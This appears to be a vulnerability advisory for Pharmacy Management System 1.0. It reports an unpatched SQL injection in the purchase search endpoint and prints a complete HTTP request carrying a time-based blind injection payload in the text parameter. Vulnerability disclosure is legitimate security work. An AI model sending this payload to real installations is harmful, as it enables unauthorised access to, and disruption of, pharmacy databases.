- Pharmacy Management System: 1.0
- Vulnerability Type: SQL Injection
- Severity: CRITICAL
- Status: Unpatched
/php/manage_purchase.php?action=search&text=3213&tag=VOUCHER_NUMBER
A critical SQL injection vulnerability was identified in the Pharmacy Management System version 1.0, specifically in the Manager Purchase search functionality. The flaw is triggered through the text parameter sent via a GET request to the endpoint /php/manage_purchase.php?action=search&text=3213&tag=VOUCHER_NUMBER. Attackers can manipulate the text input to execute arbitrary SQL commands, compromising the database's integrity and security.
This vulnerability exposes sensitive information, including financial or operational data, and can disrupt the normal functioning of the system. As there is no available patch, the risk remains critical, demanding urgent mitigation.
Below is an example of a GET request that demonstrates how the SQL injection vulnerability can be exploited by manipulating the text parameter:
GET /php/manage_purchase.php?action=search&text=3213'%20AND%20(SELECT%203786%20FROM%20(SELECT(SLEEP(5)))Tbox)--%20XBUg&tag=VOUCHER_NUMBER HTTP/1.1
Host: localhost:8080
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
sec-ch-ua-mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/manage_purchase.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
